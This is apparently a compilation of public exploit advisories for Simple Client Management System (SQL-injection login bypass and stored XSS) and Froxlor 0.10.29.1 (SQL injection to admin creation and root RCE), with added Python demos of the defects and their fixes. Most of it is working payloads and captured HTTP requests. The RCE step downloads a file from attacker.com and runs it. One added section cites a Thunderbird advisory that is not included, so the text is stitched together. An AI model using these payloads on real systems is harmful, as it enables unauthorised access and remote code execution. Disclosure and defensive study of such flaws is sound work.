An SQL injection vulnerability exists in the Simple Client Management System. An attacker can leverage the vulnerable "password" parameter of the login handler ("classes/Login.php?f=login", called from the "admin/login.php" page) to authenticate as the admin user without knowing the password.

Steps to exploit:
1) Navigate to http://localhost/cms/admin/login.php
2) Set the username to admin and insert the payload in the password parameter

Proof of concept (PoC):
The following payload in the password field logs you in as admin (URL-encoded; %3D is "="):

admin'or'1'%3D'1

Note that the captured request below carries the payload in both the username and the password field.

---
POST /cms/classes/Login.php?f=login HTTP/1.1
Host: localhost
Content-Length: 51
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/cms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn
Connection: close

username=admin'or'1'%3D'1&password=admin'or'1'%3D'1
---
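Why the payload above works, as an added example that is not part of the advisory or of the application's source: the Python block below builds the login query the way a string-concatenating PHP handler would and runs it against an in-memory SQLite fixture, then runs the same check with bound parameters. The `users` table, the stored password and the exact query text are assumptions of this example, modelled on a typical login handler rather than taken from the Simple Client Management System.

```python
import sqlite3

# Constructed fixture: one admin row. The table layout and the login query are
# an assumption modelled on a typical string-built PHP login handler; they are
# not the Simple Client Management System's own source.
PAYLOAD = "admin'or'1'='1"   # the advisory's payload with %3D decoded to '='


def _demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")
    return conn


def vulnerable_query(username, password):
    """The query text a concatenating handler would send to the database."""
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def vulnerable_login(username, password):
    """Returns the matched username, or None. The input becomes SQL syntax."""
    row = _demo_db().execute(vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(username, password):
    """Same check with bound parameters: the payload is compared as a literal."""
    row = _demo_db().execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(vulnerable_query("admin", PAYLOAD))
    print("vulnerable, password only:", vulnerable_login("admin", PAYLOAD))
    print("vulnerable, both fields:  ", vulnerable_login(PAYLOAD, PAYLOAD))
    print("parameterised:            ", safe_login("admin", PAYLOAD))
```

Because AND binds tighter than OR, the injected `or '1'='1'` makes the whole WHERE clause true regardless of the credentials, so the first row (here the admin) is returned. With bound parameters the same string is compared character by character against the stored password and no row matches.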
-
Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
# Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
# Exploit Author: Sentinal920
# Date: 5-11-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip
# Version: 1.0
# Tested on: Kali Linux
# Vulnerable page: client, invoice
# Vulnerable Parameters: "lastname", "remarks"

Technical description:
A stored XSS vulnerability exists in the Simple Client Management System. An attacker can leverage it to run JavaScript in the browsers of other users of the application, which can lead to cookie theft, defacement and more.

Steps to exploit:
1) Navigate to http://localhost/cms/admin/?page=client
2) Click on "Add New Client"
3) Insert the payload in the "lastname" field (the "remarks" field of "Add New Invoice" is affected in the same way)
4) Click save

Proof of concept (PoC):
The following payload will run the JavaScript - <script>alert(1)</script>

1) XSS PoC in Add New Client
-----------------------------
POST /cms/classes/Master.php?f=save_client HTTP/1.1
Host: localhost
Content-Length: 1026
sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/cms/admin/?page=client/manage_client
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn
Connection: close

------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="lastname"

<script>alert(1)</script>
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="firstname"

anything
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="middlename"

anything
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="dob"

2021-11-03
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="contact"

xxxxxxxxxx
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="address"

xxxxxx
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="email"

xxxx@xxx.com
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="avatar"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryIBW1SfSFiXMKK7Nt--

2) XSS PoC in Add New Invoice
-----------------------------
POST /cms/classes/Master.php?f=save_invoice HTTP/1.1
Host: localhost
Content-Length: 1032
sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/cms/admin/?page=invoice/manage_invoice
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn
Connection: close

------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="client_id"

1
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="service_id[]"

1
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="price[]"

250
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="discount_perc"

0
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="discount"

0
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="tax_perc"

0
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="tax"

0
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="total_amount"

250
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="remarks"

<script>alert(1)</script>
------WebKitFormBoundaryEk0iOWhhoA0lApXo--
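The ImportExportTools NG HTML export advisory and the Simple Client Management System stored XSS advisory above share one defect: a string chosen by the mail sender or the form submitter is concatenated into HTML without encoding for the context it lands in. The Python block below is an added example, not code from either project or advisory. It renders a table cell the unsafe way and the encoded way and uses the standard-library HTML parser to list the tags a browser would see. The `render_*` helpers, the `messages/<name>.html` link layout and the two sample payloads (adapted from the advisories) are assumptions of this example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed samples adapted from the two advisories above.
SUBJECT_PAYLOAD = 'payload in subject "><iframe src="evil.source" onload="alert(document.domain)">'
LASTNAME_PAYLOAD = "<script>alert(1)</script>"


def render_unsafe(value):
    """Concatenation as in the vulnerable code paths: the value lands unescaped
    both inside an href attribute and in a text node."""
    return '<td><a href="messages/%s.html">%s</a></td>' % (value, value)


def render_safe(value):
    """Encode per context: percent-encode the URL path segment, and HTML-escape
    (including quotes) the text node."""
    return '<td><a href="messages/%s.html">%s</a></td>' % (
        quote(value, safe=""), html.escape(value, quote=True))


class _TagCollector(HTMLParser):
    """Records every start tag the parser encounters."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(fragment):
    """Start tags a browser-like parser finds in the fragment."""
    p = _TagCollector()
    p.feed(fragment)
    p.close()
    return p.tags


if __name__ == "__main__":
    for payload in (SUBJECT_PAYLOAD, LASTNAME_PAYLOAD):
        print("unsafe:", tags_in(render_unsafe(payload)))
        print("safe:  ", tags_in(render_safe(payload)))
```

The unsafe rendering of the subject payload yields extra `iframe` start tags, and the lastname payload yields a `script` tag; the encoded rendering of both yields only the `td` and `a` the template wrote. Note that one encoder is not enough: the attribute needs URL encoding and the text node needs HTML entity encoding, which is why the export file in the Thunderbird advisory is broken in both places.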
-
Froxlor 0.10.29.1 - SQL Injection (Authenticated)
# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated)
# Exploit Author: Martin Cernac
# Date: 2021-11-05
# Vendor: Froxlor (https://froxlor.org/)
# Software Link: https://froxlor.org/download.php
# Affected Version: 0.10.28, 0.10.29, 0.10.29.1
# Patched Version: 0.10.30
# Category: Web Application
# Tested on: Ubuntu
# CVE: CVE-2021-42325

# 1. Technical Description:
#
# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL injection reachable from the authenticated customer panel. This allows an attacker to escalate privileges by creating a Froxlor administrator account and use it to get remote code execution as root on the target machine.
#
# 1.1 Pre-requisites
# - Access to a customer account
# - Ability to specify the database name when creating a database
#   (this feature is only available from 0.10.28 onward and must be manually enabled)

# 2. Proof Of Concept (PoC):
#
# The following is a walkthrough of privilege escalation from a mere customer to an admin and of achieving RCE as root.
#
# 2.1 Privilege Escalation
#
# - Sign into Froxlor as a customer
# - View your databases
# - Create a database
# - Put your payload into the "User/Database name" field (if enabled)
# - The application will error out, however the injected SQL query is executed
#
# The following POST request runs the payload provided in section 4.1, resulting in an administrator account being created
---
POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 448

s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0
---
#
# 2.2 Remote Code Execution
#
# To achieve RCE as root:
#
# - Sign into Froxlor as the newly created admin account (payload example creds are x:a)
# - Go to System Settings
# - Go to Webserver settings
# - Set the "Webserver reload command" field to a custom command
#   - The command must not contain any of the following special characters: ;|&><`$~?
#   - For details, see the "safe_exec" function in lib/Froxlor/FileDir.php
#   - For example commands see the Payloads section 4.2
# - Trigger a configuration file rebuild
#   - Use the menu item "Rebuild config files"
# - Wait for the root cron job to execute your command

# 3. Vulnerable resources and parameters
# /customer_mysql.php (POST field: custom_suffix)

# 4. Payloads
#
# 4.1 SQL Injection payload
# The following payload creates a new Froxlor admin with full access to all customers and the server configuration
# The credentials are:
# - username: x
# - password: a
#
# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);--
#
# 4.2 Remote Code Execution payload
# Two part payload (the characters rejected by safe_exec rule out chaining both steps in one command):
# - wget http://attacker.com/malicious.txt -O /runme.php
# - php /runme.php

# 5. Timeline
# 2021-10-11 Discovery
# 2021-10-11 Contact with developer
# 2021-10-11 Patch issued but no release rolled out
# 2021-10-12 Reserved CVE-2021-42325
# 2021-11-05 Fix release rolled out
# 2021-11-07 Public disclosure

# 6. References:
# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30
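The RCE step in section 2.2 works because the reload command is filtered with a character blocklist rather than validated against a known set of commands, so a plain download-and-run command passes as long as it avoids the listed characters. The Python block below is an added example, not Froxlor's code: `blocklist_allows` is modelled only on the advisory's list of rejected characters and does not reproduce safe_exec, and `ALLOWED_RELOAD_COMMANDS` is a hypothetical operator-defined allowlist. It shows that the advisory's two payloads pass the blocklist while a chained form does not, and that an exact-argv allowlist rejects all of them.

```python
import shlex

# Characters the advisory says safe_exec rejects. This filter is modelled on
# that description only; it is not Froxlor's implementation.
BLOCKED = frozenset(";|&><`$~?")

# Assumption of this example: an operator-maintained allowlist of complete
# argument vectors, the only reload commands the cron job may ever run.
ALLOWED_RELOAD_COMMANDS = (
    ["systemctl", "reload", "apache2"],
    ["systemctl", "reload", "nginx"],
    ["service", "apache2", "reload"],
)

# The advisory's two-part payload, and the chained form the blocklist stops.
PAYLOADS = [
    "wget http://attacker.com/malicious.txt -O /runme.php",
    "php /runme.php",
]
CHAINED = "; ".join(PAYLOADS)


def blocklist_allows(cmd):
    """Permissive check: any command without a blocked character is accepted."""
    return not (set(cmd) & BLOCKED)


def allowlist_allows(cmd):
    """Strict check: tokenise and accept only an exact, known argv."""
    try:
        argv = shlex.split(cmd)
    except ValueError:        # unbalanced quotes and similar
        return False
    return argv in ALLOWED_RELOAD_COMMANDS


def triage(cmd):
    """Result of both checks for one candidate reload command."""
    return {"blocklist": blocklist_allows(cmd), "allowlist": allowlist_allows(cmd)}


if __name__ == "__main__":
    for cmd in PAYLOADS + [CHAINED, "systemctl reload apache2"]:
        print("%-62s %s" % (cmd, triage(cmd)))
```

The allowlist only limits what a compromised admin account can make the root cron job execute; it does not close the customer-panel SQL injection itself, which is fixed in the 0.10.30 release referenced above.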